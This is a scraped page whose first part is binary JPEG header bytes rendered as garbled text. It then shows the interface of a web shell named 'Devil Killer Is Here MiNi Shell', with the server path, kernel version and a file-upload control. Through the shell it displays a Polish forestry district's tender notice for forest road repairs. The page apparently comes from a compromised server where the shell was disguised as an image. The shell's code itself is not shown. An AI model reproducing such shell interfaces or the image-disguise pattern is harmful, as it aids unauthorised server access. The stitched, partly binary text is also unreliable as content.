JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210916/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210916/0018283801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty remontowe nawierzchni dróg leśnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE &quot;LASY PAŃSTWOWE&quot; NADLEŚNICTWO RYBNIK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536161</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 422 37 48</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rybnik@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rybnik.katowice.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Usługi leśne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty remontowe nawierzchni dróg leśnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8b4d7958-16d8-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00182838</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00084799/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Roboty remontowe dróg leśnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z platformy Josephine https://josephine.proebiz.com/pl/<br/>stanowiącym załącznik nr 9 do SWZ. 2. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>platformy Josephine https://josephine.proebiz.com/pl/ wynosi 500 mb. 3. Za datę przekazania oferty<br/>przyjmuje się datę jej złożenia na platformie Josephine https://josephine.proebiz.com/pl/ Za datę<br/>przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na adres<br/>poczty elektronicznej Zamawiającego wskazan Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy<br/>Josephine https://josephine.proebiz.com/pl/ stanowiącym załącznik nr 9 do SWZ. 2. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem platformy Josephine https://josephine.proebiz.com/pl/<br/>wynosi 500 mb. 3. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie Josephine<br/>https://josephine.proebiz.com/pl/ Za datę przekazania wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej Zamawiającego wskazany<br/>w pkt 8.10 pkt. b) SWZ lub złożenia na platformie Josephine https://josephine.proebiz.com. 4.<br/>Zamawiający, zgodnie z § 11 ust. 2 Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie określa niezbędne wymagania techniczne umożliwiające pracę<br/>na platformie Josephine https://josephine.proebiz.com/pl/ tj. -Podłączenie do internetu; - Zainstalowana<br/>jedna z następujących przeglądarek internetowych: Microsoft Internet Explorer wersja 11.0 lub wyższa,<br/>Mozilla Firefox wersja 13.0 lub wyższa lub Google Chrome; 5. Dokumenty elektroniczne, oświadczenia<br/>lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem<br/>poczty elektronicznej, na wskazany w pkt 2 adres email. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem<br/>platformy JOSEPHINE https://josephine.proebiz.com/pl/ jako załączniki. 6. Wykonawca może zwrócić<br/>się do zamawiającego o wyjaśnienie treści specyfikacji warunków zamówienia. Zamawiający jest<br/>obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu<br/>składania ofert pod warunkiem, że wniosek o wyjaśnienie treści specyfikacji warunków zamówienia<br/>wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. 7. Jeżeli<br/>wniosek o wyjaśnienie treści SWZ wpłynął po upływie terminu składania wniosku, o którym mowa w pkt<br/>8 lub dotyczy udzielonych wyjaśnień, zamawiający może udzielić wyjaśnień albo pozostawić wniosek<br/>bez rozpoznania. 8. Treść zapytań wraz z wyjaśnieniami Zamawiający przekazuje Wykonawcom, a<br/>jeżeli specyfikacja jest udostępniana na stronie internetowej, zamieszcza na tej stronie. 9.<br/>Zamawiający nie przewiduje zwołania zebrania wykonawców. 10. W uzasadnionych przypadkach<br/>Zamawiający może przed upływem terminu składania ofert zmienić treść SWZ. Dokonaną zmianę<br/>udostępnia się na stronie internetowej. 11. Osobą uprawnioną przez Zamawiającego do<br/>porozumiewania się z wykonawcami jest: Katarzyna Szendzielorz –tel. 32/4223748 wew.*671 Marcin<br/>Fros –tel. 32/422-37-48 wew. *673. Pozostałe informacje znajdują się w dziale XII SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">XXIII. KLAUZULA INFORMACYJNA WYNIKAJACĄ Z<br/>ARTYKUŁU 13 RODO WZGLĘDEM OSÓB FIZYCZNYCH, OD KTÓRYCH DANE OSOBOWE<br/>BEZPOŚREDNIO POZYSKAŁ ZAMAWIAJĄCY<br/>Dotyczy w szczególności:<br/>- wykonawcy będącego osobą fizyczną,<br/>- wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą<br/>- pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w<br/>pełnomocnictwie),<br/>- członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe<br/>zamieszczone w informacji z KRK),<br/>-osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>1. administratorem danych osobowych jest Zamawiający tj. Nadleśnictwo Rybnik z siedzibą 44-200<br/>Rybnik, ul. Kościuszki 36, tel. 32/ 422-37-48, który posiada inspektora ochrony danych osobowych. W<br/>sprawach związanych z ochroną danych osobowych proszę kontaktować się z Inspektorem Ochrony<br/>Danych.<br/>2. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie tegoż zamówienia publicznego prowadzonym w trybie podstawowym.<br/>3. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 72 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z póź.zm.), dalej „ustawa PZP”.<br/>4. dane osobowe będą przechowywane, zgodnie z powszechnie obowiązującymi przepisami prawa<br/>oraz wewnętrzną instrukcja kancelaryjną Zamawiającego.<br/>5. obowiązek podania danych osób fizycznych bezpośrednio dotyczących tegoż zamówienia jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy PZP.<br/>6. w odniesieniu do danych osobowych osób fizycznych, decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>7. Osoby fizyczne posiadają:<br/>a) na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że<br/>przetwarzanie danych osobowych dotyczących narusza przepisy RODO,<br/>8. Osobie fizycznej nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Pozostałe informacje znajdują się w dziale XXIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> "Roboty remontowe dróg leśnych na terenie leśnictwa Wielopole, Książenice i Leboszowice”,<br/>Wykonanie robót w pasach drogowych leśnych dróg stanowiących dojazdy pożarowe: Telefoniczna w l-ctwie Książenice, Golejowska w leśnictwie Książenice i leśnictwie Wielopole, Przelotowa w leśnictwie Wielopole, droga w oddz. 304a/302i w leśnictwie Leboszowice. Zakres robót obejmuje: Uzupełnienie ubytków w nawierzchni dróg o łącznej powierzchni 1103,0m2, wymiana konstrukcji jezdni o łącznej powierzchni 905,0m2, montaż 1 szt. wodospustu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi<br/>kryterium oceny ofert:<br/>1) Cena - 60 %<br/>2) Gwarancja i rękojmia – 40 %<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------- x 100 pkt x 60%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego<br/>przedmiotu zamówienia podana w formularzu oferty. W tym kryterium wykonawca może uzyskać<br/>maksymalnie 60 punktów.<br/>Szczegółowe informacje znajdują się w dziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> "Roboty remontowe dróg leśnych na terenie leśnictwa Wodzisław, Syrynia i Chwałęcice”<br/>Wykonanie robót w pasach drogowych leśnych dróg stanowiących dojazdy pożarowe: Frydrych w Gorzyczkach, Wolmut w Czyżowicach, Lubomska w Lubomii, droga leśna w oddz. 14/15 w Leśnictwie Chwałęcice. Zakres robót obejmuje: Uzupełnienie ubytków w nawierzchni dróg o łącznej powierzchni 2455,5m2, wymiana konstrukcji jezdni o łącznej powierzchni 1025,25m2 oraz montaż 129 mb wodospustów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi<br/>kryterium oceny ofert:<br/>1) Cena - 60 %<br/>2) Gwarancja i rękojmia – 40 %<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------- x 100 pkt x 60%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego<br/>przedmiotu zamówienia podana w formularzu oferty. W tym kryterium wykonawca może uzyskać<br/>maksymalnie 60 punktów.<br/>Szczegółowe informacje znajdują się w dziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania na podstawie:<br/>a) art. 108 ust. 1 ustawy PZP (przesłanki obligatoryjne wykluczenia),<br/>b) art. 109 ust.1 pkt. 1 i 4 ustawy PZP (fakultatywne przesłanki wykluczenia), tj. Zamawiający<br/>wykluczy Wykonawcę:<br/>- który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na ubezpieczenia<br/>społeczne lub zdrowotne, z wyjątkiem przypadku, o którym mowa w art. 108 ust. 1 pkt 3, chyba<br/>że wykonawca odpowiednio przed upływem terminu do składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności<br/>należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>- w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza<br/>likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest<br/>zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/>przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>2) na podstawie art. 112 ust. 2 pkt 4 spełniają warunki udziału dotyczące zdolności technicznej<br/>lub zawodowej. Wykonawca spełni ten warunek, jeżeli wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy w tym okresie, zrealizował dwie roboty budowlane<br/>odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o<br/>wartości nie mniejszej niż 100 000,00 zł brutto każda, w zakresie robót drogowych<br/>zakończonych, tj. remont, przebudowa, odbudowa, budowa dróg o nawierzchni ulepszonej lub<br/>nieulepszonej.<br/>UWAGA<br/>1) Wykonawca nie może sumować wartości kilku robót o mniejszym zakresie dla uzyskania<br/>wymaganej wartości porównywalnej,<br/>2) Wykonawca może się powołać na doświadczenie zdobyte przy realizacji robót w ramach<br/>konsorcjum, tylko w takim zakresie, w jakim rzeczywiście roboty te sam wykonał.<br/>3) W przypadku konsorcjum przynajmniej jedna z firm musi spełnić warunek wymieniony w pkt. 2<br/>ust a.<br/>b) dysponuje co najmniej jedną osobą, która będzie pełniła funkcję 